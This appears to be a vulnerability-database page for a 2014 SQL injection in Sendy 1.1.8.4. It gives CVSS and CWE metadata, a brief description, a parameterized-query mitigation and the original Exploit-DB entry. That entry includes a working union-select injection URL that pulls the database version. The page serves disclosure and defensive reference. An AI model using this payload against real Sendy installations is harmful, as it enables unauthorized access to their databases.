header-logo
Suggest Exploit
vendor:
Sendy
by:
Hurley
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Sendy
Affected Version From: 1.1.8.4
Affected Version To: 1.1.8.4
Patch Exists: YES
Related CWE: N/A
CPE: a:sendy:sendy:1.1.8.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Sendy SqlInject

This vulnerability allows an attacker to inject malicious SQL code into the application. The attacker can use the ‘union all select’ statement to retrieve data from the database. The attacker can also use the ‘@@version’ statement to retrieve the version of the database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Sendy SqlInject
# Date: 2014-02-24
# Exploit Author: Hurley
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.8.4

Demo page:
http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

Navigation

Suggest Exploit

Services By CQR